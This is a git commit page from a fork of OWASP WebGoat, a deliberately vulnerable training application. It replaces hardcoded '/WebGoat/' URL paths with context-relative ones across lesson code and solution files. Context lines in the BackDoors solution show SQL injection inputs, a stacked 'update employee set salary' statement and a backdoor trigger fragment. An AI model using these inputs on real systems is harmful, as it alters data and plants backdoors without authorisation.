dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Removed hardcoded webgoat path for URLs

Browse Source 
git-svn-id: http://webgoat.googlecode.com/svn/trunk@367 4033779f-a91e-0410-96ef-6bf7bf53c507
This commit is contained in:
mayhew64 2008-11-21 16:57:23 +00:00
parent bab1f6aeb7
commit 9d8c58bef3
68 changed files with 592 additions and 592 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Challenge2Screen.java
View File

@ -386,11 +386,11 @@ public class Challenge2Screen extends SequentialLessonAdapter
// show webgoat.jsp text
ec.addElement(new H1().addElement("Original Website Text"));
ec.addElement(new IFrame().setHeight("500").setWidth("100%").setSrc("/WebGoat/" + WEBGOAT_CHALLENGE_JSP));
ec.addElement(new IFrame().setHeight("500").setWidth("100%").setSrc(s.getRequest().getContextPath() + "/" + WEBGOAT_CHALLENGE_JSP));
ec.addElement(new HR());
ec.addElement(new H1().addElement("Defaced Website Text"));
ec.addElement(new IFrame().setHeight("500").setWidth("100%").setSrc(
"/WebGoat/" + WEBGOAT_CHALLENGE + "_"
s.getRequest().getContextPath() + "/" + WEBGOAT_CHALLENGE + "_"
+ s.getUserName() + JSP));
ec.addElement(new HR());

6
webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/WSDLScanning.java
View File

@ -136,7 +136,7 @@ public class WSDLScanning extends LessonAdapter
return "WSDL Scanning";
}
public Object accessWGService(String serv, int port, String proc, String parameterName, Object parameterValue)
public Object accessWGService(WebSession s, String serv, int port, String proc, String parameterName, Object parameterValue)
{
String targetNamespace = "WebGoat";
try
@ -150,7 +150,7 @@ public class WSDLScanning extends LessonAdapter
call.setReturnType(XMLType.XSD_STRING);
call.setUsername("guest");
call.setPassword("guest");
call.setTargetEndpointAddress("http://localhost:" + port + "/WebGoat/services/" + serv);
call.setTargetEndpointAddress("http://localhost:" + port + "/" + s.getRequest().getContextPath() + "/services/" + serv);
Object result = call.invoke(new Object[] { parameterValue });
return result;
} catch (RemoteException e)
@ -214,7 +214,7 @@ public class WSDLScanning extends LessonAdapter
for (int i = 0; i < fields.length; i++)
{
header.addElement(new TD().addElement(fields[i]));
results.addElement(new TD().addElement((String) accessWGService("WSDLScanning", port, fields[i],
results.addElement(new TD().addElement((String) accessWGService(s, "WSDLScanning", port, fields[i],
"acct_num", new Integer(id))));
}
if (fields.length == 0)

4
webgoat/main/project/JavaSource/org/owasp/webgoat/util/Interceptor.java
View File

@ -123,8 +123,8 @@ public class Interceptor implements Filter
String url = req.getRequestURL().toString();
RequestDispatcher disp = req.getRequestDispatcher(url.substring(url.lastIndexOf("WebGoat/")
+ "WebGoat".length()));
RequestDispatcher disp = req.getRequestDispatcher(url.substring(url.lastIndexOf(req.getContextPath() + "/")
+ req.getContextPath().length()));
disp.forward(request, response);

8
webgoat/main/project/WebContent/lesson_plans/HowToWork.html
View File

@ -15,7 +15,7 @@ in the Introduction section.</p>
<h2>The WebGoat Interface</h2>
<p>
<img src="/WebGoat/images/introduction/interface.jpg"><br><br>
<img src="images/introduction/interface.jpg"><br><br>
1. These are Lesson Categories in WebGoat. Click on a Category to see all Lessons in it.<br>
2. This will show technical hints to solve the lesson.<br>
3. This will show the HTTP Request Parameters<br>
@ -34,16 +34,16 @@ solution for complete details.</p>
To read and edit Parameters you need a local proxy to intercept the HTTP request.
Here we use WebScarab. More information on WebScarab can be found in the "Useful Tools" Chapter.
After installing WebScarab and configuring your browser to use it as proxy on localhost we can start.<br><br>
<img src="/WebGoat/images/introduction/HowToUse_1.jpg"><br><br>
<img src="images/introduction/HowToUse_1.jpg"><br><br>
We have to select "Intercept Request" in the tab "Intercept". If we send a HTTP request we get a new WebScarab window.<br><br>
<img src="/WebGoat/images/introduction/HowToUse_2.jpg"><br><br>
<img src="images/introduction/HowToUse_2.jpg"><br><br>
Here we can read and edit the intercepted parameter. After "Accept changes" the request will be sent to the server.
</p>
<h2>Read And Edit Cookies</h2>
<p>
Often it is not only necessary to change the value of the parameters but to change the value of cookies.
We can use WebScarab to intercept the request and change cookies values just like parameter data as explained in the last topic.<br><br>
<img src="/WebGoat/images/introduction/HowToUse_3.jpg"><br><br>
<img src="images/introduction/HowToUse_3.jpg"><br><br>
We get a new window on sending a HTTP request. On the screenshot you see where we can find cookies and how to edit the values of them.
</p>
<!-- Stop Instructions -->

8
webgoat/main/project/WebContent/lesson_plans/UsefulTools.html
View File

@ -10,26 +10,26 @@ WebScarab is a proxy for analyzing applications that
communicate using the HTTP and HTTPS protocols. Because WebScarab
operates as an intercepting proxy, we can review and modify requests
and responses.<br><br>
<img src="/WebGoat/images/introduction/webscarab.jpg"><br><br>
<img src="images/introduction/webscarab.jpg"><br><br>
Webpage:<a href="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project">http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project</a>
</p>
<h2>Firebug:</h2>
<p>
Firebug is an add-on for the Firefox browser. We can use it to inspect, edit and monitor CSS, HTML and JavaScript.<br><br>
<img src="/WebGoat/images/introduction/firebug.jpg"><br><br>
<img src="images/introduction/firebug.jpg"><br><br>
Webpage:<a href="http://www.getfirebug.com" target="_blank">http://www.getfirebug.com</a>
<br><br>
<h2>IEWatch:</h2>
<p>
IEWatch is a tool to analyze HTTP and HTML for users of the Internet Explorer.<br><br>
<img src="/WebGoat/images/introduction/iewatch.jpg"><br><br>
<img src="images/introduction/iewatch.jpg"><br><br>
Webpage:<a href="http://www.iewatch.com" target="_blank">http://www.iewatch.com</a>
</p>
<h2>Wireshark</h2>
<p>
Wireshark is a network protocol analyzer. You can sniff network traffic and gather useful
informations this way.<br><br>
<img src="/WebGoat/images/introduction/wireshark.png"><br><br>
<img src="images/introduction/wireshark.png"><br><br>
Webpage:<a href="http://www.wireshark.org" target="_blank">http://www.wireshark.org</a>
</p>

16
webgoat/main/project/WebContent/lesson_solutions/AccessControlMatrix.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/AccessControlMatrix_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/AccessControlMatrix_files/editdata.mso">
<link rel=File-List href="lesson_solutions/AccessControlMatrix_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/AccessControlMatrix_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/AccessControlMatrix_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/AccessControlMatrix_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/AccessControlMatrix_files/colorschememapping.xml">
href="lesson_solutions/AccessControlMatrix_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -656,9 +656,9 @@ you will learn that Larry can access resources of the role Account Manager.<o:p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_463" o:spid="_x0000_i1026" type="#_x0000_t75"
style='width:480pt;height:276pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/AccessControlMatrix_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/AccessControlMatrix_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/AccessControlMatrix_files/image002.jpg" v:shapes="Picture_x0020_463"><![endif]></span></p>
src="lesson_solutions/AccessControlMatrix_files/image002.jpg" v:shapes="Picture_x0020_463"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -672,9 +672,9 @@ field-end'></span><![endif]--> Lesson 9<span style='font-family:"Arial","sans-se
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_464"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/AccessControlMatrix_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/AccessControlMatrix_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/AccessControlMatrix_files/image004.jpg" v:shapes="Picture_x0020_464"><![endif]></span></p>
src="lesson_solutions/AccessControlMatrix_files/image004.jpg" v:shapes="Picture_x0020_464"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

32
webgoat/main/project/WebContent/lesson_solutions/BackDoors.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/BackDoors_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/BackDoors_files/editdata.mso">
<link rel=File-List href="lesson_solutions/BackDoors_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/BackDoors_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/BackDoors_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/BackDoors_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/BackDoors_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/BackDoors_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -698,9 +698,9 @@ yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_147" o:spid="_x0000_i1030" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BackDoors_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/BackDoors_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/BackDoors_files/image013.jpg" v:shapes="Picture_x0020_147"><![endif]></span></p>
src="lesson_solutions/BackDoors_files/image013.jpg" v:shapes="Picture_x0020_147"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -722,9 +722,9 @@ bold'><o:p>&nbsp;</o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_148"
o:spid="_x0000_i1029" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BackDoors_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/BackDoors_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/BackDoors_files/image014.jpg" v:shapes="Picture_x0020_148"><![endif]></span></p>
src="lesson_solutions/BackDoors_files/image014.jpg" v:shapes="Picture_x0020_148"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -758,9 +758,9 @@ for the user ID: 101; update employee set salary=10000<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_149"
o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BackDoors_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/BackDoors_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/BackDoors_files/image015.jpg" v:shapes="Picture_x0020_149"><![endif]></span></p>
src="lesson_solutions/BackDoors_files/image015.jpg" v:shapes="Picture_x0020_149"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -775,9 +775,9 @@ bold'><o:p>&nbsp;</o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_150"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BackDoors_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/BackDoors_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/BackDoors_files/image016.jpg" v:shapes="Picture_x0020_150"><![endif]></span></p>
src="lesson_solutions/BackDoors_files/image016.jpg" v:shapes="Picture_x0020_150"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -798,9 +798,9 @@ email='john@hackme.com'WHERE userid = NEW.userid<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_151"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BackDoors_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/BackDoors_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/BackDoors_files/image017.jpg" v:shapes="Picture_x0020_151"><![endif]></span></p>
src="lesson_solutions/BackDoors_files/image017.jpg" v:shapes="Picture_x0020_151"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -814,9 +814,9 @@ field-end'></span><![endif]--> Insert trigger</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_152" o:spid="_x0000_i1025"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BackDoors_files/image011.png" o:title=""/>
<v:imagedata src="lesson_solutions/BackDoors_files/image011.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/BackDoors_files/image018.jpg" v:shapes="Picture_x0020_152"><![endif]></span></p>
src="lesson_solutions/BackDoors_files/image018.jpg" v:shapes="Picture_x0020_152"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

56
webgoat/main/project/WebContent/lesson_solutions/BasicAuthentication.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/BasicAuthentication_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/BasicAuthentication_files/editdata.mso">
<link rel=File-List href="lesson_solutions/BasicAuthentication_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/BasicAuthentication_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/BasicAuthentication_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/BasicAuthentication_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/BasicAuthentication_files/colorschememapping.xml">
href="lesson_solutions/BasicAuthentication_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -637,9 +637,9 @@ questions below.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_1015" o:spid="_x0000_i1036" type="#_x0000_t75"
style='width:480pt;height:276pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image025.jpg" v:shapes="Picture_x0020_1015"><![endif]></span></p>
src="lesson_solutions/BasicAuthentication_files/image025.jpg" v:shapes="Picture_x0020_1015"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -659,9 +659,9 @@ request with WebScarab.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1016"
o:spid="_x0000_i1035" type="#_x0000_t75" style='width:459.75pt;height:362.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=613 height=483
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image026.jpg" v:shapes="Picture_x0020_1016"><![endif]></span></p>
src="lesson_solutions/BasicAuthentication_files/image026.jpg" v:shapes="Picture_x0020_1016"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -682,9 +682,9 @@ this by using WebScarab > Tools > Transcoder.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1017"
o:spid="_x0000_i1034" type="#_x0000_t75" style='width:365.25pt;height:243.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=487 height=325
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image027.jpg" v:shapes="Picture_x0020_1017"><![endif]></span></p>
src="lesson_solutions/BasicAuthentication_files/image027.jpg" v:shapes="Picture_x0020_1017"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -704,9 +704,9 @@ decode. <o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1018"
o:spid="_x0000_i1033" type="#_x0000_t75" style='width:449.25pt;height:300pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=599 height=400
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image028.jpg" v:shapes="Picture_x0020_1018"><![endif]></span></p>
src="lesson_solutions/BasicAuthentication_files/image028.jpg" v:shapes="Picture_x0020_1018"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -725,9 +725,9 @@ be used to complete the questions.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1019"
o:spid="_x0000_i1032" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image029.jpg" v:shapes="Picture_x0020_1019"><![endif]></span></p>
src="lesson_solutions/BasicAuthentication_files/image029.jpg" v:shapes="Picture_x0020_1019"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -743,9 +743,9 @@ field-end'></span><![endif]--> Answers<span style='font-family:"Arial","sans-ser
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1020"
o:spid="_x0000_i1031" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image011.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image011.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image030.jpg" v:shapes="Picture_x0020_1020"><![endif]></span></p>
src="lesson_solutions/BasicAuthentication_files/image030.jpg" v:shapes="Picture_x0020_1020"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -764,9 +764,9 @@ authentication.<o:p></o:p></span></p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1021" o:spid="_x0000_i1030"
type="#_x0000_t75" style='width:435.75pt;height:343.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image013.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image013.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=581 height=458
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image031.jpg" v:shapes="Picture_x0020_1021"><![endif]></span><span
src="lesson_solutions/BasicAuthentication_files/image031.jpg" v:shapes="Picture_x0020_1021"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@ -811,9 +811,9 @@ cookie is sent in every request.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1022"
o:spid="_x0000_i1029" type="#_x0000_t75" style='width:244.5pt;height:265.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image015.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image015.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=326 height=354
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image032.jpg" v:shapes="Picture_x0020_1022"><![endif]></span></p>
src="lesson_solutions/BasicAuthentication_files/image032.jpg" v:shapes="Picture_x0020_1022"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -833,9 +833,9 @@ can decode this value in WebScarab > Tools > Transcoder).<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1023"
o:spid="_x0000_i1028" type="#_x0000_t75" style='width:459.75pt;height:362.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image017.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image017.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=613 height=483
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image033.jpg" v:shapes="Picture_x0020_1023"><![endif]></span></p>
src="lesson_solutions/BasicAuthentication_files/image033.jpg" v:shapes="Picture_x0020_1023"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -860,9 +860,9 @@ screenshot below.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1024"
o:spid="_x0000_i1027" type="#_x0000_t75" style='width:448.5pt;height:353.25pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image019.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image019.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=598 height=471
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image034.jpg" v:shapes="Picture_x0020_1024"><![endif]></span></p>
src="lesson_solutions/BasicAuthentication_files/image034.jpg" v:shapes="Picture_x0020_1024"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -878,9 +878,9 @@ field-end'></span><![endif]--> Corrupt JSESSIONID<span style='font-family:"Arial
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1025"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image021.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image021.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image035.jpg" v:shapes="Picture_x0020_1025"><![endif]></span></p>
src="lesson_solutions/BasicAuthentication_files/image035.jpg" v:shapes="Picture_x0020_1025"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -902,9 +902,9 @@ lesson "Basic Authentication" to complete this lesson.<o:p></o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1026"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BasicAuthentication_files/image023.png" o:title=""/>
<v:imagedata src="lesson_solutions/BasicAuthentication_files/image023.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="/WebGoat/lesson_solutions/BasicAuthentication_files/image036.jpg" v:shapes="Picture_x0020_1026"><![endif]></span></p>
src="lesson_solutions/BasicAuthentication_files/image036.jpg" v:shapes="Picture_x0020_1026"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC

32
webgoat/main/project/WebContent/lesson_solutions/BlindSqlInjection.html
View File

@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/BlindSqlInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/BlindSqlInjection_files/editdata.mso">
<link rel=File-List href="lesson_solutions/BlindSqlInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/BlindSqlInjection_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,9 +36,9 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/BlindSqlInjection_files/themedata.thmx">
<link rel=themeData href="lesson_solutions/BlindSqlInjection_files/themedata.thmx">
<link rel=colorSchemeMapping
href="/WebGoat/lesson_solutions/BlindSqlInjection_files/colorschememapping.xml">
href="lesson_solutions/BlindSqlInjection_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
@ -741,9 +741,9 @@ then answer is no.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_1419" o:spid="_x0000_i1030" type="#_x0000_t75"
style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/BlindSqlInjection_files/image001.png" o:title=""/>
